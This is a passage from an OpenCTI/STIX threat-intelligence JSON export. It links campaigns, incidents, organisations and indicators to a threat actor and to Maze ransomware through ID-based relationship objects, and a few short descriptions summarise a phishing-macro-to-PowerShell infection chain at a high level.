"id": "relationship--fa57e1ab-092d-44a4-90a4-bea3641bd96e",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"target_ref": "identity--f4c6843f-ed38-46e0-9e95-35c781f935b1",
"x_opencti_source_ref": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"x_opencti_target_ref": "identity--f4c6843f-ed38-46e0-9e95-35c781f935b1",
"created": "2020-01-08T16:11:19.358Z",
"modified": "2020-01-08T16:11:19.358Z",
"x_opencti_first_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "cc0eacfa-cd0b-471f-85fd-41818be81b18",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f805adbe-2c0b-4c13-a375-562b7ba8b625",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"target_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"x_opencti_source_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"x_opencti_target_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"created": "2020-02-04T15:26:57.109Z",
"modified": "2020-02-04T15:26:57.109Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6dc1938e-b447-476f-bcf5-4396dd6477d1",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--7de932be-bdd3-4c2a-8fa3-239e6a1b43dc",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"target_ref": "identity--d2d2f930-4f0e-409b-9565-899ba3aba6af",
"x_opencti_source_ref": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"x_opencti_target_ref": "identity--d2d2f930-4f0e-409b-9565-899ba3aba6af",
"created": "2020-02-04T15:28:01.025Z",
"modified": "2020-02-04T15:28:01.025Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "3dfc0e24-80a7-4382-a28c-f7bf9d31bdb2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5ccd07e8-781d-43c0-8448-0d6a18617554",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"created": "2020-02-04T15:31:59.613Z",
"modified": "2020-02-04T15:31:59.613Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "57750dd4-bacd-41d1-98e1-ea4d0a875a5f",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--8685ab4e-e44b-42f8-9f0a-0ce0b69ca115",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:32:15.773Z",
"modified": "2020-02-04T15:32:15.773Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "445d4fa9-6b54-43d2-9fc5-68bae9c72fea",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--f43ffd59-c8c6-4271-a322-c78ffb83555b",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"target_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"x_opencti_source_ref": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"x_opencti_target_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"created": "2020-02-04T15:32:22.782Z",
"modified": "2020-02-04T15:32:22.782Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "40ce522b-826e-4f43-ab1c-d8b207356546",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--6227f6bc-1caf-47fb-8c66-21135550ed76",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:35:05.605Z",
"modified": "2020-02-04T15:35:05.605Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d553ec01-a53d-42e3-bc04-3c415559e3d4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--87236979-65e4-445e-bd16-186f2081bc2c",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"created": "2020-02-04T15:39:16.051Z",
"modified": "2020-02-04T15:39:16.051Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6bb2752c-b594-48a1-8cd4-6aabe28703ff",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--dd384fe8-e2f4-49c8-a0f5-f56571f4413d",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"target_ref": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"x_opencti_source_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"x_opencti_target_ref": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"created": "2020-02-04T15:44:42.487Z",
"modified": "2020-02-04T15:44:42.487Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "67a53793-568e-41a3-9e4f-643fd6848ecc",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--bfc58ac1-0388-483b-b9c7-6c3695adfc0e",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:47:58.765Z",
"modified": "2020-02-04T15:47:58.765Z",
"x_opencti_first_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b327e979-78a5-42c5-8d8e-ddbedbe60087",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--dff57daf-f597-4a66-a9bb-ad6487f1bb66",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"x_opencti_source_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"x_opencti_target_ref": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"created": "2020-02-04T15:48:45.296Z",
"modified": "2020-02-04T15:48:45.296Z",
"x_opencti_first_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-15T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e9379750-75d9-4fab-8a4b-043b72cbc18e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--4332e775-2fbf-4c61-9513-a24d554d6099",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"target_ref": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"x_opencti_source_ref": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"x_opencti_target_ref": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"created": "2020-02-04T16:03:29.624Z",
"modified": "2020-02-04T16:03:29.624Z",
"x_opencti_first_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_last_seen": "2020-11-30T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "444d6f61-f7c7-47a2-9c23-543bea34a906",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--ec3deac6-a9df-4987-947c-b6ec35871d3e",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"target_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"x_opencti_source_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_target_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"created": "2020-02-04T16:07:26.423Z",
"modified": "2020-02-04T16:07:26.423Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-11-17T23:00:00.000Z",
"x_opencti_weight": 2,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "4ccff364-96c3-428c-9e0c-8e97f30819d9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--2c3bb531-75e8-4337-9f21-e181956ed8ca",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--8895042c-7c13-4d86-a4de-6e8b560a0519",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--8895042c-7c13-4d86-a4de-6e8b560a0519",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:00:24.052Z",
"modified": "2020-02-05T10:00:24.052Z",
"x_opencti_first_seen": "2020-02-05T10:00:24.052Z",
"x_opencti_last_seen": "2020-02-05T10:00:24.052Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "df247c92-f9fb-4c18-9f00-09bd525a7527",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--cd3b1416-3550-4c03-84c9-deeebe1bf6e3",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--6cf4aa42-fe72-4cb8-a91d-c54b09533a8d",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--6cf4aa42-fe72-4cb8-a91d-c54b09533a8d",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:48.532Z",
"modified": "2020-02-05T10:04:48.532Z",
"x_opencti_first_seen": "2020-02-05T10:04:48.532Z",
"x_opencti_last_seen": "2020-02-05T10:04:48.532Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "996960b3-3816-4c6e-9207-564118ac0f42",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--4b5067b7-c297-4ad7-a4c4-5ddeab47996d",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--699fa50b-7154-4581-b5c4-cd62d8c04a7d",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--699fa50b-7154-4581-b5c4-cd62d8c04a7d",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:14.677Z",
"modified": "2020-02-05T10:05:14.677Z",
"x_opencti_first_seen": "2020-02-05T10:05:14.677Z",
"x_opencti_last_seen": "2020-02-05T10:05:14.677Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7259641f-362e-42c2-8fc1-e792982ff262",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--927f8898-69f6-4815-a389-b92be0920466",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--4d3eb24a-9f23-48a8-9282-ec2987012725",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--4d3eb24a-9f23-48a8-9282-ec2987012725",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:46.590Z",
"modified": "2020-02-05T10:05:46.590Z",
"x_opencti_first_seen": "2020-02-05T10:05:46.590Z",
"x_opencti_last_seen": "2020-02-05T10:05:46.590Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d6a52775-3cc9-410d-a11f-0f2bab644c2e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--b26692b6-492a-4975-a48c-0532813f3bd7",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--d7519fd7-a6f1-4c05-86b6-39397c61c5b5",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--d7519fd7-a6f1-4c05-86b6-39397c61c5b5",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:52.797Z",
"modified": "2020-02-05T10:05:52.797Z",
"x_opencti_first_seen": "2020-02-05T10:05:52.797Z",
"x_opencti_last_seen": "2020-02-05T10:05:52.797Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ff556562-0bd9-4ff8-a970-e58aa11bf35d",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--aac9bb6c-e142-4caf-a1a3-67c627bbc04a",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--05024cf6-871c-4274-bc86-103dce87bab7",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--05024cf6-871c-4274-bc86-103dce87bab7",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:07.673Z",
"modified": "2020-02-05T10:06:07.673Z",
"x_opencti_first_seen": "2020-02-05T10:06:07.673Z",
"x_opencti_last_seen": "2020-02-05T10:06:07.673Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b788f395-1158-4b99-ad5d-7442603907ad",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--16d0e325-54d2-485d-86b0-0b041661ec95",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--4f6cfd26-3328-40e5-90f7-e05d94fde810",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--4f6cfd26-3328-40e5-90f7-e05d94fde810",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:10.638Z",
"modified": "2020-02-05T10:06:10.638Z",
"x_opencti_first_seen": "2020-02-05T10:06:10.638Z",
"x_opencti_last_seen": "2020-02-05T10:06:10.638Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "41d44006-f39d-4abe-94f8-609aa412261a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--0838f4ff-c6ed-4aac-9401-4dfb3bfc7bc6",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-01-07T14:48:33.908Z",
"modified": "2020-01-07T14:48:33.908Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "eddb7f37-83ea-4306-bf11-a90fc023ffcd",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--7278efc9-d16f-4f1e-9902-c44eac1ddfc6",
"type": "relationship",
"relationship_type": "attributed-to",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-01-07T14:35:36.523Z",
"modified": "2020-01-07T14:35:36.523Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "a43cf423-441f-48f3-8c56-6c9c55d2f5b9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--58a80e8b-9ae2-4c52-80dd-85d77ceaa1df",
"type": "relationship",
"relationship_type": "uses",
"description": "The emails, as part of a low-volume campaign across multiple\nverticals, were targeted primarily at manufacturing companies and\nused an infection chain of Microsoft Office macros into a\nPowerShell script, which ultimately downloads and installs Maze\nransomware.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"created": "2020-01-07T14:37:02.412Z",
"modified": "2020-01-07T14:37:02.412Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "46c034d3-9d20-4478-acb2-9f72dcd43321",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--affdc44d-4a4a-4ffa-a391-9593344c468a",
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
"x_opencti_id": "c4f5146a-9d20-3165-a443-f2046980029d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:35.000Z",
"x_opencti_modified": "2019-04-15T16:53:35.000Z"
}
]
},
{
"id": "relationship--7b15dda1-f16b-4853-b09c-82929f243c0f",
"type": "relationship",
"relationship_type": "uses",
"description": "The Microsoft Word attachment, when opened, executes a Microsoft Office macro that, in turn, executes a PowerShell script, which downloads and installs the Maze ransomware payload onto\nthe victim\u2019s system.",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"created": "2020-01-07T14:31:46.592Z",
"modified": "2020-01-07T14:31:46.592Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f516fc10-0c0a-4bf6-9ac9-cdb0c6dde8d5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--affdc44d-4a4a-4ffa-a391-9593344c468a",
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
"x_opencti_id": "c4f5146a-9d20-3165-a443-f2046980029d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:35.000Z",
"x_opencti_modified": "2019-04-15T16:53:35.000Z"
}
]
},
{
"id": "relationship--704cfd8c-f9b9-41a7-9816-4fa48a222fef",
"type": "relationship",
"relationship_type": "uses",
"description": "Delivered by spearsphishing attachment.",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"created": "2020-02-04T14:42:37.501Z",
"modified": "2020-02-04T14:42:37.501Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "643db9b4-793e-4873-a355-8be957954b0e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9757781f-2322-4a4e-8651-64a6e883c538",
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
"x_opencti_id": "13cfffc3-1a9e-3c61-9316-0df2bbd23390",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:56:35.000Z",
"x_opencti_modified": "2019-04-15T16:56:35.000Z"
},
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--023e9621-78d7-48ac-a9aa-fe54b55b1271",
"type": "relationship",
"relationship_type": "uses",
"description": "The emails, as part of a low-volume campaign across multiple\nverticals, were targeted primarily at manufacturing companies and\nused an infection chain of Microsoft Office macros into a\nPowerShell script, which ultimately downloads and installs Maze\nransomware.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-07T14:37:13.659Z",
"modified": "2020-01-07T14:37:13.659Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "fd1d72c9-8b7c-4d57-afba-6cc13d6e9117",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--528c12c0-42ae-4c68-bbd5-733b34510517",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"target_ref": "malware--c6006dd5-31ca-45c2-8ae0-4e428e712f88",
"x_opencti_source_ref": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"x_opencti_target_ref": "malware--c6006dd5-31ca-45c2-8ae0-4e428e712f88",
"created": "2020-02-04T14:49:06.241Z",
"modified": "2020-02-04T14:49:06.241Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-17T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "95a1cb81-cdd3-4b79-9f6d-48067182695b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--93d3d709-0d95-4465-834b-4704ad1665f8",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-08T16:00:47.981Z",
"modified": "2020-01-08T16:00:47.981Z",
"x_opencti_first_seen": "2019-12-10T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-23T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "629459c6-c51b-4120-ae44-5fbacee22913",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--ef64aac0-ae6b-4660-b7f9-44d8ceb81c1c",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"target_ref": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"x_opencti_source_ref": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"x_opencti_target_ref": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"created": "2020-02-04T15:34:52.200Z",
"modified": "2020-02-04T15:34:52.200Z",
"x_opencti_first_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-20T23:00:00.000Z",
"x_opencti_weight": 3,
